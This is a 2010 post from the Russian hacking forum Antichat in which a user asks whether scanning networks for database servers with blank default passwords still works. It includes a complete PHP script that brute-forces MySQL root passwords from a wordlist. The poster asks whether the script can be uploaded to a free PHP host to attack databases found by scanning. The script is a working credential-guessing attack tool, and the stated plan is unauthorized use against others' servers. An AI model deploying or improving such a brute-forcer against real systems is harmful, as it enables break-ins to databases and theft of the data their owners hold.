Форум АНТИЧАТ - пару вопросов по статейке

пару вопросов по статейке - Взлом СУБД

15.05.2010, 00:55

Demon1X

Познающий

Регистрация: 31.05.2007

Сообщений: 39

Провел на форуме:
164949

Репутация: 0

пару вопросов по статейке - Взлом СУБД

тут вчера наткнулся на статейку http://www.inattack.ru/article/469.html

суть которой сводится к тому что можно просканить сеть каким нибудь сканером (например nmap-ом) и попробывать приконнектится к СУБД с расчетом, что когда ее устанавливали забыли по дефолту пароль поставить

1. это актуально? т.е. такое еще работает, статейка та не первой свежести

2. т.к. недавно начал изучать пых по прочтению решил набросать простой скриптик-брутер. У меня на локалхосте нормально пас подбирает к mysql. Вопрос можно ли будет его залить на фрихост с поддержкой пхп и оттуда брутить найденные сканером СУБД?

Код:

<?php
$host="localhost";
$name="root";
 
set_time_limit(0);
$f=fopen("words.dic","rt") or die("Нет файла с паролями!");

if (@mysql_connect($host,$name,"")){
   echo "Пароля нет!";
   fclose ($f);
   @mysql_close();
   exit;
}//if

while (true){
    $str=trim(fgets ($f));
	if ($str=="") break;

	if (@mysql_connect($host,$name,$str)){
	    echo "Пароль: ".$str;
		fclose ($f);
		@mysql_close();
		exit;
	}//if
}//wh
  
echo "Пароль не найден!";
fclose ($f);
?>